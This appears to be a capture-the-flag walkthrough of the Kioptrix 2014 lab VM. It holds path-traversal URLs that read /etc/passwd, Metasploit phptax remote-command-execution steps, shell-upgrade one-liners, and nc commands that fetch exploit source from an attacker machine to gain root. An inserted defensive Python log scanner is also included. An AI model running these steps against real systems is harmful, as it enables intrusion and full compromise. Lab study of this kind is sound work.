Mornin'~~~
Address: http://www.vulnhub.com/entry/kioptrix-2014-5,62/
The focus here is on tool usage and the testing approach. During testing, after the VM image was imported into the hypervisor, nmap could not find its IP; the author provides a fix for this in the description.
nmap 192.168.43.0/24
Target IP: 192.168.43.186
nmap -A -p1-65535 192.168.43.186
80/tcp open http
8080/tcp open http
Visit http://192.168.43.186/ and http://192.168.43.186:8080/
View the source of http://192.168.43.186/ and find the hidden path pChart2.1.3/index.php
dirb http://192.168.43.186/
nikto -h http://192.168.43.186/
This reveals Apache/2.2.21 (FreeBSD)
Attack payload: https://www.exploit-db.com/exploits/31173
http://192.168.43.186/pChart2.1.3/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd
Apache configuration file path:
https://cwiki.apache.org/confluence/display/HTTPD/DistrosDefaultLayout#DistrosDefaultLayout-FreeBSD6.1%28Apachehttpd2.2%29:
http://192.168.43.186/pChart2.1.3/index.php?Action=View&Script=%2f..%2f..%2fusr/local/etc/apache22/httpd.conf
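The Script parameter above is a plain path traversal: the application takes a user-supplied file name and reads it without anchoring it under its own directory, so /etc/passwd and the httpd.conf path can be read through it. As an added defensive example, not part of the original writeup or of pChart, the block below shows the two things an operator would want: a log scanner that URL-decodes request targets (including double encoding) and flags parent-directory hops, and the hardened resolution a file-serving handler should use instead. The log lines are constructed for the example and the root path /srv/pchart is a hypothetical placeholder.

```python
import os
import re
import urllib.parse
from typing import List, Tuple

# Constructed Apache combined-format log lines (not taken from the target).
# The first and third carry traversal payloads; the second is a legitimate pChart request.
SAMPLE_LOG = """\
192.0.2.10 - - [10/Oct/2023:13:55:36 +0000] "GET /pChart2.1.3/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd HTTP/1.1" 200 2326 "-" "Mozilla/5.0"
192.0.2.11 - - [10/Oct/2023:13:55:40 +0000] "GET /pChart2.1.3/index.php?Action=View&Script=examples/example.drawBar.php HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
192.0.2.12 - - [10/Oct/2023:13:55:44 +0000] "GET /index.php?page=%252e%252e%252f%252e%252e%252fetc%252fpasswd HTTP/1.1" 404 512 "-" "curl/7.88"
"""

# Pulls the client IP and the request target out of a combined-format line.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (?P<target>\S+) HTTP/'
)


def decode_fully(value: str, max_rounds: int = 3) -> str:
    """URL-decode repeatedly so double-encoded sequences (%252e -> %2e -> .) are exposed."""
    for _ in range(max_rounds):
        decoded = urllib.parse.unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def is_traversal_attempt(request_target: str) -> bool:
    """True when the decoded request target contains a parent-directory hop."""
    decoded = decode_fully(request_target).replace("\\", "/")
    return "../" in decoded or decoded.endswith("/..")


def flag_traversal_requests(log_text: str) -> List[Tuple[str, str]]:
    """Return (client_ip, request_target) for every log line that looks like traversal."""
    hits: List[Tuple[str, str]] = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if m and is_traversal_attempt(m.group("target")):
            hits.append((m.group("ip"), m.group("target")))
    return hits


def is_within_root(root: str, requested: str) -> bool:
    """Hardened resolution for a user-supplied file name.

    The name is anchored under `root`, canonicalised with realpath (which also
    follows symlinks, so a link inside root pointing outside is rejected too),
    and accepted only if the result is still root or a path below it.
    """
    root_real = os.path.realpath(root)
    # os.path.join would discard root for an absolute `requested`, so strip leading slashes.
    candidate = os.path.realpath(os.path.join(root_real, requested.lstrip("/")))
    return candidate == root_real or candidate.startswith(root_real + os.sep)


if __name__ == "__main__":
    for ip, target in flag_traversal_requests(SAMPLE_LOG):
        print(f"traversal attempt from {ip}: {target}")
    # Hypothetical document root for the Script parameter.
    print(is_within_root("/srv/pchart", "../../etc/passwd"))  # False
    print(is_within_root("/srv/pchart", "examples/example.drawBar.php"))  # True
```

The scanner decodes before matching because a single-pass check misses the %252e form; the containment check compares canonical paths rather than looking for ".." in the string, which is what a file-serving handler should do in place of string blacklists.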
Install the User-Agent Switcher and Manager add-on in Firefox and change the UA to Mozilla/4.0
Visit http://192.168.43.186:8080 to discover the phptax directory
phptax remote command execution payload, using Metasploit
https://www.exploit-db.com/exploits/21833
Enter msfconsole
search phptax
use exploit/multi/http/phptax_exec
show options
set RHOST 192.168.43.186
set RPORT 8080
run
python -c 'import pty; pty.spawn("/bin/bash")'
echo os.system('/bin/bash')
/bin/sh -i
uname -a
FreeBSD 9.0 privilege escalation
https://www.exploit-db.com/exploits/28718
On the attacker machine: nc -lvnp 6666 < tiquan.c
Download the file on the target:
cd /tmp
nc -nv 192.168.43.154 6666 > tiquan.c
gcc tiquan.c
Run ./a.out to obtain root privileges